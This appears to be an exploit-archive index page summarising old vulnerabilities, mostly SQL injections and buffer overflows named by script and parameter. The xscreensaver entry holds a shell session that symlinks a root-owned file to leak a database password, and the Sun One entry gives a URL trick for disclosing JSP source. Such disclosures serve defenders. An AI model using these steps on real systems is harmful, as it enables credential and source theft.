Explore all Exploits:

PatPlayer v3.9 (M3U File) Local Heap Overflow PoC

PatPlayer v3.9 is vulnerable to a local heap overflow when a specially crafted M3U file is opened. The vulnerability is caused by a boundary error when handling the '#EXTM3U' header of the M3U file. This can be exploited to cause a stack-based buffer overflow by supplying a specially crafted M3U file containing an overly long '#EXTM3U' header.

phpBMS v0.96 SQL Injection Vulnerabilities

Multiple SQL injection vulnerabilities exist in phpBMS v0.96 due to improper sanitization of user-supplied input. An attacker can exploit these vulnerabilities to gain access to sensitive information such as login credentials and passwords. The first vulnerability exists in the 'invoices_discount_ajax.php' script, where the 'id' parameter is not properly sanitized before being used in a SQL query. The second exists in the 'dbgraphic.php' script, where the 'f', 'mf', 't', and 'r' parameters are not properly sanitized before being used in a SQL query. The third exists in the 'advancedsearch.php' script, where the 'tid' and 'base' parameters are not properly sanitized before being used in a SQL query. In each case, an attacker can exploit the vulnerability by sending a specially crafted HTTP request containing malicious SQL statements.

IE Add Favourites Stack Buffer Overflow POC

This proof-of-concept code exploits a stack buffer overflow vulnerability in Internet Explorer. The vulnerability is triggered when a user adds a maliciously crafted URL to their favorites list. The code creates a long string of characters and passes it to the vulnerable function, which causes a stack buffer overflow.

Universe CMS 1.0.6 (id) Remote SQL Injection Exploit

Universe CMS 1.0.6 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability to gain access to the admin panel of the application. The exploit code uses the 'id' parameter in the 'vnews.php' script to inject malicious SQL code into the application. The malicious code is used to extract the admin username and password from the 'uni_users' table.

Siteframe CMS 3.2.x SQL Injection & phpinfo() Disclosure Vulnerability

Siteframe CMS version 3.2.x is vulnerable to SQL Injection and phpinfo() Disclosure. An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable parameter 'id' in the document.php file. An attacker can also access the phpinfo.php file to view the system information.

xscreensaver local arbitrary file disclosure | symlink attack

The "xscreensaver" program normally distributed with Xorg can be abused to disclose local files owned by other users, including files owned by the root account. Xscreensaver has the setuid bit on by default (example: OpenSolaris). The xscreensaver program reads its configuration options from the file ~/.xscreensaver. If this file is a symlink to another file, the target file is parsed and the output is shown on the display. Note that the parser may not show the full contents of the file. Here is an example attack scenario on an OpenSolaris default install (with Xorg):

kcope@opensolaris:~# ls -la /root/db.php && cat /root/db.php
-rw------- 1 root root 61 Dez 27 17:59 /root/db.php
$db_user = "root";
$db_pass = "secret";
kcope@opensolaris:~$ ln -s /root/db.php ~/.xscreensaver
kcope@opensolaris:~$ ls -la ~/.xscreensaver
lrwxrwxrwx 1 kcope staff 12 1986-12-27 18:01 /export/home/kcope/.xscreensaver -> /root/db.php
kcope@opensolaris:~$ xscreensaver -verbose
xscreensaver 5.01, copyright (c) 1991-2006 by Jamie Zawinski <jwz@jwz.org>.
xscreensaver: running as kcope/staff (101/10); effectively root/staff (0/10)
xscreensaver: in process 2186.
xscreensaver: /export/home/kcope/.xscreensaver:1: unparsable line: $db_user = "root";
xscreensaver: /export/home/kcope/.xscreensaver:2: unparsable line: $db_pass = "secret";
xscreensaver: 18:02:26: running /usr/X11/lib/xscreensaver/bin/xscreensaver-gl-helper: No such file or directory
xscreensaver: 18:02:26: /usr/X11/lib/xscreensaver/bin/xscreensaver-gl-helper did not report a GL visual!
.................................
.................................
.................................

As the output above shows, the contents of the root-owned file db.php are printed in the xscreensaver output.

Sun One WebServer 6.1 JSP Source Viewing vulnerability

SunOne WebServer (formerly Netscape Enterprise Server, iPlanet) on Windows systems lets remote users disclose JSP source code. A normal URL would look like: http://server/hello.jsp and to disclose the contents of a JSP file, including its source code: http://server/hello.jsp::$DATA

Talkback V 2.3.14

The Talkback V 2.3.14 script is vulnerable to command injection. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'result' parameter in the 'talkback/addons/import.php' script. An attacker can exploit this vulnerability to execute arbitrary commands on the vulnerable system with the privileges of the web server process.

EasyVillaRentalSite (id) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in EasyVillaRentalSite. An attacker can exploit this vulnerability to gain access to sensitive information such as user credentials, database name, and version. This is achieved by sending a specially crafted HTTP request to the vulnerable application containing malicious SQL statements in the 'Id' parameter of the 'show_category.php' script.
